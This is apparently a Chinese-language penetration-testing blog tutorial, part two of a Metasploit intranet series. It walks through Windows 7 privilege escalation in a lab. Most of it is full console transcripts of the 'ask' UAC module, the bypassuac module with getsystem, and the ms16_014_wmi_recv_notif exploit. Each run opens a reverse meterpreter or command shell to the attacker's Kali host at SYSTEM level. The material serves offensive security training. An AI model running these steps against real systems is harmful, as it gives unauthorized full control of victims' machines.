MSF內(nèi)網(wǎng)滲透系列2-權(quán)限提升

在上篇文章中伏蚊，通過win7運行msf.exe泳唠，kali接收到一個session醒陆，但這個session權(quán)限只是普通權(quán)限，無法做更多的操作葫掉。
權(quán)限提升
1.提高程序運行級別
2.UAC繞過
3.利用提權(quán)漏洞進行提權(quán)

提高程序運行級別
msf模塊>exploit/windows/local/ask
但會觸發(fā)UAC些举，只有當(dāng)用戶同意是才能獲得更高權(quán)限

  5         meterpreter x64/windows  win7-PC\win7 @ WIN7-PC         192.168.159.149:4444 -> 192.168.159.145:49248 (192.168.159.145)

msf5 exploit(multi/handler) > sessions -i 5
[*] Starting interaction with 5...

meterpreter > getuid
Server username: win7-PC\win7
meterpreter > background
[*] Backgrounding session 5...
msf5 exploit(multi/handler) > use exploit/windows/local/ask 
msf5 exploit(windows/local/ask) > info

       Name: Windows Escalate UAC Execute RunAs
     Module: exploit/windows/local/ask
   Platform: Windows
       Arch: 
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2012-01-03

Provided by:
  mubix <mubix@hak5.org>
  b00stfr3ak

Available targets:
  Id  Name
  --  ----
  0   Windows

Check supported:
  No

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  FILENAME   QQ.exe           no        File name on disk
  PATH                        no        Location on disk, %TEMP% used if not set
  SESSION    1                yes       The session to run this module on.
  TECHNIQUE  EXE              yes       Technique to use (Accepted: PSH, EXE)

Payload information:

Description:
  This module will attempt to elevate execution level using the 
  ShellExecute undocumented RunAs flag to bypass low UAC settings.

msf5 exploit(windows/local/ask) >

可以看到session 5只是普通權(quán)限，這時候利用ask模塊進行提權(quán)俭厚，該模塊需要設(shè)置要用來提權(quán)的session户魏，以及啟動程序的名稱

msf5 exploit(windows/local/ask) > set session 5
session => 5
msf5 exploit(windows/local/ask) > set filename execl.exe
filename => execl.exe
msf5 exploit(windows/local/ask) >

ask模塊設(shè)置完成后，就可以使用了挪挤，運行exploit叼丑，回到win7，可以看見彈出一個execl.exe程序框扛门，如果你點擊是鸠信，則kali會獲得一個新的session，如果點擊否论寨，則kali會得到失敗信息星立。

msf5 exploit(windows/local/ask) > exploit

[*] Started reverse TCP handler on 192.168.159.149:4444 
[*] UAC is Enabled, checking level...
[*] The user will be prompted, wait for them to click 'Ok'
[*] Uploading execl.exe - 73802 bytes to the filesystem...
[*] Executing Command!

Win7 截圖：

image.png

win7 點擊否，kali返回信息：

msf5 exploit(windows/local/ask) > exploit

[*] Started reverse TCP handler on 192.168.159.149:4444 
[*] UAC is Enabled, checking level...
[*] The user will be prompted, wait for them to click 'Ok'
[*] Uploading execl.exe - 73802 bytes to the filesystem...
[*] Executing Command!
[-] Exploit failed [timeout-expired]: Timeout::Error execution expired
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/ask) >

win7 點擊是葬凳，kali獲取到新的session

msf5 exploit(windows/local/ask) > exploit

[*] Started reverse TCP handler on 192.168.159.149:4444 
[*] UAC is Enabled, checking level...
[*] The user will be prompted, wait for them to click 'Ok'
[*] Uploading execl.exe - 73802 bytes to the filesystem...
[*] Executing Command!
[*] Sending stage (180291 bytes) to 192.168.159.145
[*] Meterpreter session 6 opened (192.168.159.149:4444 -> 192.168.159.145:49249) at 2020-07-10 15:30:43 +0800
meterpreter >

使用background退出這個meterpreter
使用sessions绰垂，查看session
使用sessions -i 6，進入新獲取的session
使用getuid查看該session權(quán)限
發(fā)現(xiàn)還是普通權(quán)限
這時候使用getsystem火焰，獲得系統(tǒng)權(quán)限
再使用getuid查看

msf5 exploit(windows/local/ask) > sessions

Active sessions
===============

  Id  Name  Type                     Information             Connection
  --  ----  ----                     -----------             ----------
  5         meterpreter x64/windows  win7-PC\win7 @ WIN7-PC  192.168.159.149:4444 -> 192.168.159.145:49248 (192.168.159.145)
  6         meterpreter x64/windows  win7-PC\win7 @ WIN7-PC  192.168.159.149:4444 -> 192.168.159.145:49249 (192.168.159.145)

msf5 exploit(windows/local/ask) > sessions -i 6
[*] Starting interaction with 6...

meterpreter > getuid
Server username: win7-PC\win7
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

UAC繞過
msf模塊
exploit/windows/local/bypassuac
exploit/windows/local/bypassuac_injection
exploit/windows/local/bypassuac_vbs

這里使用第一個模塊進行繞過UAC提權(quán)

msf5 > use exploit/windows/local/bypassuac
使用bypassuac模塊
msf5 exploit(windows/local/bypassuac) > set session 5
session => 5
設(shè)置需要提權(quán)的session
msf5 exploit(windows/local/bypassuac) > exploit

[*] Started reverse TCP handler on 192.168.159.149:4444 
[*] UAC is Enabled, checking level...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[+] Part of Administrators group! Continuing...
[*] Uploaded the agent to the filesystem....
[*] Uploading the bypass UAC executable to the filesystem...
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Sending stage (180291 bytes) to 192.168.159.145
[*] Meterpreter session 7 opened (192.168.159.149:4444 -> 192.168.159.145:49250) at 2020-07-10 16:00:14 +0800
獲得新的session
meterpreter > getuid
Server username: win7-PC\win7
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
成功提權(quán)

利用提權(quán)漏洞進行提權(quán)
exploit/windows/local/ms14_058_track_popup_menu
等等
這里使用
exploit/windows/local/ms16_014_wmi_recv_notif
這個模塊劲装，同樣使用info和show options查看信息，只需要設(shè)置一個session就可以使用
攻擊成功會直接返回一個shell，使用whoami查看權(quán)限

msf5 exploit(windows/local/ms16_014_wmi_recv_notif) > show options

Module options (exploit/windows/local/ms16_014_wmi_recv_notif):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 SP0/SP1


msf5 exploit(windows/local/ms16_014_wmi_recv_notif) > set session 8
session => 8
msf5 exploit(windows/local/ms16_014_wmi_recv_notif) > sessions

Active sessions
===============

  Id  Name  Type                     Information             Connection
  --  ----  ----                     -----------             ----------
  8         meterpreter x64/windows  win7-PC\win7 @ WIN7-PC  192.168.159.149:4444 -> 192.168.159.145:49251 (192.168.159.145)

msf5 exploit(windows/local/ms16_014_wmi_recv_notif) > exploit

[*] Started reverse TCP handler on 192.168.159.149:4444 
[*] Launching notepad to host the exploit...
[+] Process 1820 launched.
[*] Reflectively injecting the exploit DLL into 1820...
[*] Injecting exploit into 1820...
[*] Exploit injected. Injecting payload into 1820...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Command shell session 9 opened (192.168.159.149:4444 -> 192.168.159.145:49255) at 2020-07-10 16:29:00 +0800

C:\Users\win7\Desktop>whoami
whoami
nt authority\system

C:\Users\win7\Desktop>

成功提權(quán)